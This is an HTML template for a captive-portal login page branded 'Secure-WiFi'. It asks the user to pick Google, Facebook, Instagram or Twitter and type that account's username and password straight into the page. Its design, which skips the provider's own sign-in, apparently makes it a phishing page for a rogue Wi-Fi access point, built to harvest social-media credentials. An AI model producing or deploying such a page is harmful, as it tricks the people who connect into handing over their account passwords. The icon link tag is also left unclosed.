<!DOCTYPE html>
<html>
    <head>

        <title>{{ locale.title }}</title>

        <!-- META TAGS -->
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="theme-color" content="#183641">

        <!-- STYLES & ICONS -->
        <link rel="stylesheet" href="/styles/w3.css">
        <link rel="stylesheet" href="/styles/portal.css">
        <link rel="icon" type="image/png" href="/images/icon.png"

    </head>
    <body>

        <!-- PORTAL -->
        <div id="portal" class="w3-card-4 w3-round w3-center">

            <h1 class="w3-text-white">{{ locale.login }}</h1>

            <!-- SOCIAL ICONS -->
            <div id="social" class="w3-row-padding w3-margin-top">
                <div class="w3-col s3">
                    <img src="/images/google.png">
                </div>
                <div class="w3-col s3">
                    <img src="/images/facebook.png">
                </div>
                <div class="w3-col s3">
                    <img src="/images/instagram.png">
                </div>
                <div class="w3-col s3">
                    <img src="/images/twitter.png">
                </div>
            </div>

            <!-- FORM -->
            <div class="w3-margin">
                <select id="type" class="w3-select">
                    <option value="google">Google</option>
                    <option value="facebook">Facebook</option>
                    <option value="instagram">Instagram</option>
                    <option value="twitter">Twitter</option>
                </select>
                <input type="text" id="username" class="w3-input" placeholder="{{ locale.username }}">
                <input type="password" id="password" class="w3-input" placeholder="{{ locale.password }}">
                <button id="login" class="w3-btn w3-card w3-margin-top w3-text-white">
                    <span>{{ locale.login }}</span>
                    <svg id="dots" width="132px" height="22px" viewBox="0 0 132 58" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
                        <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">
                            <g id="dots" sketch:type="MSArtboardGroup" fill="#A3A3A3">
                                <circle id="dot1" sketch:type="MSShapeGroup" cx="25" cy="30" r="8"></circle>
                                <circle id="dot2" sketch:type="MSShapeGroup" cx="65" cy="30" r="8"></circle>
                                <circle id="dot3" sketch:type="MSShapeGroup" cx="105" cy="30" r="8"></circle>
                            </g>
                        </g>
                    </svg>
                </button>
                <p id="error" class="w3-small w3-text-red">{{ locale.error }}</p>
            </div>

            <div id="description" class="w3-container w3-text-white">
                <img src="/images/icon.png"> Secure-WiFi
                <p class="w3-small">{{ locale.description }}</p>
            </div>

        </div>

        <!-- SCRIPTS -->
        <script src="/scripts/ajax.js"></script>
        <script src="/scripts/portal.js"></script>

    </body>
</html>
